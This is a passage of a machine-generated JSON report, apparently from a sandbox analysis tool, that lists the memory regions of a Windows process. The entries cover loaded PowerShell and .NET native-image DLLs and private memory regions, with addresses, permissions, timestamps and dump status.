"\\Windows\\assembly\\NativeImages_v2.0.50727_64\\Microsoft.PowerShel#\\ec50af274bf7a15fb59ac1f0d353b7ea\\Microsoft.PowerShell.Commands.Diagnostics.ni.dll", "id": "region_993", "name": "microsoft.powershell.commands.diagnostics.ni.dll", "norm_filename": "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\microsoft.powershel#\\ec50af274bf7a15fb59ac1f0d353b7ea\\microsoft.powershell.commands.diagnostics.ni.dll", "region_type": "memory_mapped_file", "start_va": 8791338123264, "timestamp": "00:00:23.533", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 204800, "start_va": 8791549280256, "type": "region", "version": 1 }, "end_va": 8791549485055, "entry_point": 8791549280256, "filename": "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\System.Configuratio#\\fcf35536476614410e0b0bd0e412199e\\System.Configuration.Install.ni.dll", "id": "region_994", "name": "system.configuration.install.ni.dll", "norm_filename": "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\system.configuratio#\\fcf35536476614410e0b0bd0e412199e\\system.configuration.install.ni.dll", "region_type": "memory_mapped_file", "start_va": 8791549280256, "timestamp": "00:00:23.542", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 33816576, "type": "region", "version": 1 }, "end_va": 33820671, "entry_point": 0, "filename": null, "id": "region_995", "name": "pagefile_0x0000000002040000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 33816576, "timestamp": "00:00:24.019", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 40960, "start_va": 6884820647936, "type": "region", "version": 1 }, "end_va": 6884820688895, "entry_point": 6884820647936, "filename": "\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Culture.dll", "id": "region_996", "name": "culture.dll", "norm_filename": "c:\\windows\\microsoft.net\\framework64\\v2.0.50727\\culture.dll", "region_type": "memory_mapped_file", "start_va": 6884820647936, "timestamp": "00:00:24.020", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1146880, "start_va": 8791259545600, "type": "region", "version": 1 }, "end_va": 8791260692479, "entry_point": 8791259545600, "filename": "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\Microsoft.PowerShel#\\9206dc8156588e608d405729c833edc5\\Microsoft.PowerShell.Commands.Management.ni.dll", "id": "region_997", "name": "microsoft.powershell.commands.management.ni.dll", "norm_filename": "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\microsoft.powershel#\\9206dc8156588e608d405729c833edc5\\microsoft.powershell.commands.management.ni.dll", "region_type": "memory_mapped_file", "start_va": 8791259545600, "timestamp": "00:00:24.028", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 2187264, "start_va": 8791260725248, "type": "region", "version": 1 }, "end_va": 8791262912511, "entry_point": 8791260725248, "filename": "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\Microsoft.PowerShel#\\cdf48153115fc0bb466f37b7dcad9ac5\\Microsoft.PowerShell.Commands.Utility.ni.dll", "id": "region_998", "name": "microsoft.powershell.commands.utility.ni.dll", "norm_filename": "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\microsoft.powershel#\\cdf48153115fc0bb466f37b7dcad9ac5\\microsoft.powershell.commands.utility.ni.dll", "region_type": "memory_mapped_file", "start_va": 8791260725248, "timestamp": "00:00:24.035", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 253952, "start_va": 8791320363008, "type": "region", "version": 1 }, "end_va": 8791320616959, "entry_point": 8791320363008, "filename": "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\Microsoft.PowerShel#\\b5a6a5ce3cd3d4dd2b151315c612aeff\\Microsoft.PowerShell.Security.ni.dll", "id": "region_999", "name": "microsoft.powershell.security.ni.dll", "norm_filename": "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\microsoft.powershel#\\b5a6a5ce3cd3d4dd2b151315c612aeff\\microsoft.powershell.security.ni.dll", "region_type": "memory_mapped_file", "start_va": 8791320363008, "timestamp": "00:00:24.043", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable" ], "ref_process_dump": null, "size": 344064, "start_va": 461242368, "type": "region", "version": 1 }, "end_va": 461586431, "entry_point": 461242368, "filename": "\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorrc.dll", "id": "region_1000", "name": "mscorrc.dll", "norm_filename": "c:\\windows\\microsoft.net\\framework64\\v2.0.50727\\mscorrc.dll", "region_type": "memory_mapped_file", "start_va": 461242368, "timestamp": "00:00:24.349", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1658880, "start_va": 8791249321984, "type": "region", "version": 1 }, "end_va": 8791250980863, "entry_point": 8791249321984, "filename": "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\System.DirectorySer#\\c1cdea55f62c9e8b9b9c1ae4c23b1c1f\\System.DirectoryServices.ni.dll", "id": "region_1001", "name": "system.directoryservices.ni.dll", "norm_filename": "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\system.directoryser#\\c1cdea55f62c9e8b9b9c1ae4c23b1c1f\\system.directoryservices.ni.dll", "region_type": "memory_mapped_file", "start_va": 8791249321984, "timestamp": "00:00:24.352", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1490944, "start_va": 8791251025920, "type": "region", "version": 1 }, "end_va": 8791252516863, "entry_point": 8791251025920, "filename": "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\System.Management\\c44929bde355680c886f8a52f5e22b81\\System.Management.ni.dll", "id": "region_1002", "name": "system.management.ni.dll", "norm_filename": "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\system.management\\c44929bde355680c886f8a52f5e22b81\\system.management.ni.dll", "region_type": "memory_mapped_file", "start_va": 8791251025920, "timestamp": "00:00:24.359", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 6967296, "start_va": 8791252533248, "type": "region", "version": 1 }, "end_va": 8791259500543, "entry_point": 8791252533248, "filename": "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\System.Xml\\ee795155543768ea67eecddc686a1e9e\\System.Xml.ni.dll", "id": "region_1003", "name": "system.xml.ni.dll", "norm_filename": "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\system.xml\\ee795155543768ea67eecddc686a1e9e\\system.xml.ni.dll", "region_type": "memory_mapped_file", "start_va": 8791252533248, "timestamp": "00:00:24.366", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 28672, "start_va": 8791616258048, "type": "region", "version": 1 }, "end_va": 8791616286719, "entry_point": 8791616258048, "filename": "\\Windows\\System32\\shfolder.dll", "id": "region_1004", "name": "shfolder.dll", "norm_filename": "c:\\windows\\system32\\shfolder.dll", "region_type": "memory_mapped_file", "start_va": 8791616258048, "timestamp": "00:00:24.373", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 69632, "start_va": 33816576, "type": "region", "version": 1 }, "end_va": 33886207, "entry_point": 0, "filename": null, "id": "region_1005", "name": "pagefile_0x0000000002040000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 33816576, "timestamp": "00:00:24.614", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00001008-addr_0x000007ff00180000-size_0x0000000000010000-perm_.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "" ], "ref_process_dump": { "ref_id": "proc_dump_78", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 8791799627776, "type": "region", "version": 1 }, "end_va": 8791799693311, "entry_point": 0, "filename": null, "id": "region_1008", "name": "private_0x000007ff00180000", "norm_filename": null, "region_type": "private_memory", "start_va": 8791799627776, "timestamp": "00:00:24.632", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00001009-addr_0x000007ff00190000-size_0x0000000000010000-perm_.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "" ], "ref_process_dump": { "ref_id": "proc_dump_79", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 8791799693312, "type": "region", "version": 1 }, "end_va": 8791799758847, "entry_point": 0, "filename": null, "id": "region_1009", "name": "private_0x000007ff00190000", "norm_filename": null, "region_type": "private_memory", "start_va": 8791799693312, "timestamp": "00:00:24.632", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00001010-addr_0x000007ff001a0000-size_0x0000000000010000-perm_.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "" ], "ref_process_dump": { "ref_id": "proc_dump_80", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 8791799758848, "type": "region", "version": 1 }, "end_va": 8791799824383, "entry_point": 0, "filename": null, "id": "region_1010", "name": "private_0x000007ff001a0000", "norm_filename": null, "region_type": "private_memory", "start_va": 8791799758848, "timestamp": "00:00:24.632", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00001011-addr_0x000007ff001b0000-size_0x0000000000010000-perm_.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "" ], "ref_process_dump": { "ref_id": "proc_dump_81", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 8791799824384, "type": "region", "version": 1 }, "end_va": 8791799889919, "entry_point": 0, "filename": null, "id": "region_1011", "name": "private_0x000007ff001b0000", "norm_filename": null, "region_type": "private_memory", "start_va": 8791799824384, "timestamp": "00:00:24.633", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00001012-addr_0x000007ff001c0000-size_0x0000000000010000-perm_.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "" ], "ref_process_dump": { "ref_id": "proc_dump_82", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 8791799889920, "type": "region", "version": 1 }, "end_va": 8791799955455, "entry_point": 0, "filename": null, "id": "region_1012", "name": "private_0x000007ff001c0000", "norm_filename": null, "region_type": "private_memory", "start_va": 8791799889920, "timestamp": "00:00:24.633", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00001013-addr_0x000007ff001d0000-size_0x0000000000010000-perm_.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "" ], "ref_process_dump": { "ref_id": "proc_dump_83", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 8791799955456, "type": "region", "version": 1 }, "end_va": 8791800020991, "entry_point": 0, "filename": null, "id": "region_1013", "name": "private_0x000007ff001d0000", "norm_filename": null, "region_type": "private_memory", "start_va": 8791799955456, "timestamp": "00:00:24.633", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00001014-addr_0x000007ff001e0000-size_0x0000000000010000-perm_.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "" ], "ref_process_dump": { "ref_id": "proc_dump_84", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 8791800020992, "type": "region", "version": 1 }, "end_va": 8791800086527, "entry_point": 0, "filename": null, "id": "region_1014", "name": "private_0x000007ff001e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 8791800020992, "timestamp": "00:00:24.633", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00001016-addr_0x000007ff001f0000-size_0x0000000000010000-perm_.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "" ], "ref_process_dump": { "ref_id": "proc_dump_85", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 8791800086528, "type": "region", "version": 1 }, "end_va": 8791800152063, "entry_point": 0, "filename": null, "id": "region_1016", "name": "private_0x000007ff001f0000", "norm_filename": null, "region_type": "private_memory", "start_va": 8791800086528, "timestamp": "00:00:25.001", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00001017-addr_0x000007ff00200000-size_0x0000000000010000-perm_.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "" ], "ref_process_dump": { "ref_id": "proc_dump_86", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 8791800152064, "type": "region", "version": 1 }, "end_va": 8791800217599, "entry_point": 0, "filename": null, "id": "region_1017", "name": "private_0x000007ff00200000", "norm_filename": null, "region_type": "private_memory", "start_va": 8791800152064, "timestamp": "00:00:25.001", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00001018-addr_0x000007ff00210000-size_0x0000000000010000-perm_.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "" ], "ref_process_dump": { "ref_id": "proc_dump_87", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 8791800217600, "type": "region", "version": 1 }, "end_va": 8791800283135, "entry_point": 0, "filename": null, "id": "region_1018", "name": "private_0x000007ff00210000", "norm_filename": null, "region_type": "private_memory", "start_va": 8791800217600, "timestamp": "00:00:25.002", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00001020-addr_0x000000001b840000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_88", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 461635584, "type": "region", "version": 1 }, "end_va": 462684159, "entry_point": 0, "filename": null, "id": "region_1020", "name": "private_0x000000001b840000", "norm_filename": null, "region_type": "private_memory", "start_va": 461635584, "timestamp": "00:00:25.041", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00001028-addr_0x000007ff00220000-size_0x0000000000010000-perm_.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "" ], "ref_process_dump": { "ref_id": "proc_dump_89", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 8791800283136, "type": "region", "version": 1 }, "end_va": 8791800348671, "entry_point": 0, "filename": null, "id": "region_1028", "name": "private_0x000007ff00220000", "norm_filename": null, "region_type": "private_memory", "start_va": 8791800283136, "timestamp": "00:00:25.342", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00001029-addr_0x000007ff00230000-size_0x0000000000010000-perm_.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "" ], "ref_process_dump": { "ref_id": "proc_dump_90", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 8791800348672, "type": "region", "version": 1 }, "end_va": 8791800414207, "entry_point": 0, "filename": null, "id": "region_1029", "name": "private_0x000007ff00230000", "norm_filename": null, "region_type": "private_memory", "start_va": 8791800348672, "timestamp": "00:00:25.342", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00001030-addr_0x0000000002ae0000-size_0x0000000000010000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_91", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 44957696, "type": "region", "version": 1 }, "end_va": 45023231, "entry_point": 0, "filename": null, "id": "region_1030", "name": "private_0x0000000002ae0000", "norm_filename": null, "region_type": "private_memory", "start_va": 44957696, "timestamp": "00:00:25.389", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00001031-addr_0x0000000002af0000-size_0x0000000000010000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_92", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 45023232, "type": "region", "version": 1 }, "end_va": 45088767, "entry_point": 0, "filename": null, "id": "region_1031", "name": "private_0x0000000002af0000", "norm_filename": null, "region_type": "private_memory", "start_va": 45023232, "timestamp": "00:00:25.390", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00001032-addr_0x0000000002b00000-size_0x0000000000010000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_93", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 45088768, "type": "region", "version": 1 }, "end_va": 45154303, "entry_point": 0, "filename": null, "id": "region_1032", "name": "private_0x0000000002b00000", "norm_filename": null, "region_type": "private_memory", "start_va": 45088768, "timestamp": "00:00:25.390", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00001033-addr_0x000000001bc40000-size_0x0000000000010000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_94", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 465829888, "type": "region", "version": 1 }, "end_va": 465895423, "entry_point": 0, "filename": null, "id": "region_1033", "name": "private_0x000000001bc40000", "norm_filename": null, "region_type": "private_memory", "start_va": 465829888, "timestamp": "00:00:25.390", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00001034-addr_0x000007ff00240000-size_0x0000000000010000-perm_.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "" ], "ref_process_dump": { "ref_id": "proc_dump_95", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 8791800414208, "type": "region", "version": 1 }, "end_va": 8791800479743, "entry_point": 0, "filename": null, "id": "region_1034", "name": "private_0x000007ff00240000", "norm_filename": null, "region_type": "private_memory", "start_va": 8791800414208, "timestamp": "00:00:25.390", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00001035-addr_0x000007ff00250000-size_0x0000000000010000-perm_.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "" ], "ref_process_dump": { "ref_id": "proc_dump_96", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 8791800479744, "type": "region", "version": 1 }, "end_va": 8791800545279, "entry_point": 0, "filename": null, "id": "region_1035", "name": "private_0x000007ff00250000", "norm_filename": null, "region_type": "private_memory", "start_va": 8791800479744, "timestamp": "00:00:25.391", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00001036-addr_0x000007ff00260000-size_0x0000000000010000-perm_.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "" ], "ref_process_dump": { "ref_id": "proc_dump_97", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 8791800545280, "type": "region", "version": 1 }, "end_va": 8791800610815, "entry_point": 0, "filename": null, "id": "region_1036", "name": "private_0x000007ff00260000", "norm_filename": null, "region_type": "private_memory", "start_va": 8791800545280, "timestamp": "00:00:25.391", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00001037-addr_0x000000001bc50000-size_0x0000000000010000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_98", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 465895424, "type": "region", "version": 1 }, "end_va": 465960959, "entry_point": 0, "filename": null, "id": "region_1037", "name": "private_0x000000001bc50000", "norm_filename": null, "region_type": "private_memory", "start_va": 465895424, "timestamp": "00:00:26.269", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00001038-addr_0x000000001bcf0000-size_0x0000000000990000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_99", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 10027008, "start_va": 466550784, "type": "region", "version": 1 }, "end_va": 476577791, "entry_point": 0, "filename": null, "id": "region_1038", "name": "private_0x000000001bcf0000", "norm_filename": null, "region_type": "private_memory", "start_va": 466550784, "timestamp": "00:00:26.270", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00001040-addr_0x000007ff00270000-size_0x0000000000010000-perm_.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "" ], "ref_process_dump": { "ref_id": "proc_dump_100", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 8791800610816, "type": "region", "version": 1 }, "end_va": 8791800676351, "entry_point": 0, "filename": null, "id": "region_1040", "name": "private_0x000007ff00270000", "norm_filename": null, "region_type": "private_memory", "start_va": 8791800610816, "timestamp": "00:00:26.280", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00001041-addr_0x000007fffffac000-size_0x0000000000002000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_101", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 8192, "start_va": 8796092678144, "type": "region", "version": 1 }, "end_va": 8796092686335, "entry_point": 0, "filename": null, "id": "region_1041", "name": "private_0x000007fffffac000", "norm_filename": null, "region_type": "private_memory", "start_va": 8796092678144, "timestamp": "00:00:26.280", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00001046-addr_0x000000001c680000-size_0x0000000000180000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_102", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1572864, "start_va": 476577792, "type": "region", "version": 1 }, "end_va": 478150655, "entry_point": 0, "filename": null, "id": "region_1046", "name": "private_0x000000001c680000", "norm_filename": null, "region_type": "private_memory", "start_va": 476577792, "timestamp": "00:00:26.439", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00001050-addr_0x000000001c910000-size_0x0000000000080000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_103", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 524288, "start_va": 479264768, "type": "region", "version": 1 }, "end_va": 479789055, "entry_point": 0, "filename": null, "id": "region_1050", "name": "private_0x000000001c910000", "norm_filename": null, "region_type": "private_memory", "start_va": 479264768, "timestamp": "00:00:26.513", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00001053-addr_0x000007fffffaa000-size_0x0000000000002000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_104", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 8192, "start_va": 8796092669952, "type": "region", "version": 1 }, "end_va": 8796092678143, "entry_point": 0, "filename": null, "id": "region_1053", "name": "private_0x000007fffffaa000", "norm_filename": null, "region_type": "private_memory", "start_va": 8796092669952, "timestamp": "00:00:26.529", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00001054-addr_0x000000001c9e0000-size_0x0000000000080000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_105", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 524288, "start_va": 480116736, "type": "region", "version": 1 }, "end_va": 480641023, "entry_point": 0, "filename": null, "id": "region_1054", "name": "private_0x000000001c9e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 480116736, "timestamp": "00:00:26.535", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00001056-addr_0x000007fffffa8000-size_0x0000000000002000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_106", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 8192, "start_va": 8796092661760, "type": "region", "version": 1 }, "end_va": 8796092669951, "entry_point": 0, "filename": null, "id": "region_1056", "name": "private_0x000007fffffa8000", "norm_filename": null, "region_type": "private_memory", "start_va": 8796092661760, "timestamp": "00:00:26.547", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00001061-addr_0x000000001ca70000-size_0x0000000000080000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_107", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 524288, "start_va": 480706560, "type": "region", "version": 1 }, "end_va": 481230847, "entry_point": 0, "filename": null, "id": "region_1061", "name": "private_0x000000001ca70000", "norm_filename": null, "region_type": "private_memory", "start_va": 480706560, "timestamp": "00:00:26.644", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00001063-addr_0x000007fffffa6000-size_0x0000000000002000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_108", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 8192, "start_va": 8796092653568, "type": "region", "version": 1 }, "end_va": 8796092661759, "entry_point": 0, "filename": null, "id": "region_1063", "name": "private_0x000007fffffa6000", "norm_filename": null, "region_type": "private_memory", "start_va": 8796092653568, "timestamp": "00:00:26.657", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00001064-addr_0x000000001caf0000-size_0x0000000000200000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_109", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 2097152, "start_va": 481230848, "type": "region", "version": 1 }, "end_va": 483327999, "entry_point": 0, "filename": null, "id": "region_1064", "name": "private_0x000000001caf0000", "norm_filename": null, "region_type": "private_memory", "start_va": 481230848, "timestamp": "00:00:26.658", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00001067-addr_0x000000001c680000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_110", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 476577792, "type": "region", "version": 1 }, "end_va": 477626367, "entry_point": 0, "filename": null, "id": "region_1067", "name": "private_0x000000001c680000", "norm_filename": null, "region_type": "private_memory", "start_va": 476577792, "timestamp": "00:00:26.717", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00001068-addr_0x000000001c780000-size_0x0000000000080000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_111", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 524288, "start_va": 477626368, "type": "region", "version": 1 }, "end_va": 478150655, "entry_point": 0, "filename": null, "id": "region_1068", "name": "private_0x000000001c780000", "norm_filename": null, "region_type": "private_memory", "start_va": 477626368, "timestamp": "00:00:26.717", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00001069-addr_0x000007ff00280000-size_0x0000000000010000-perm_.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "" ], "ref_process_dump": { "ref_id": "proc_dump_112", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 8791800676352, "type": "region", "version": 1 }, "end_va": 8791800741887, "entry_point": 0, "filename": null, "id": "region_1069", "name": "private_0x000007ff00280000", "norm_filename": null, "region_type": "private_memory", "start_va": 8791800676352, "timestamp": "00:00:27.612", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00001071-addr_0x000000001c870000-size_0x0000000000080000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_113", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 524288, "start_va": 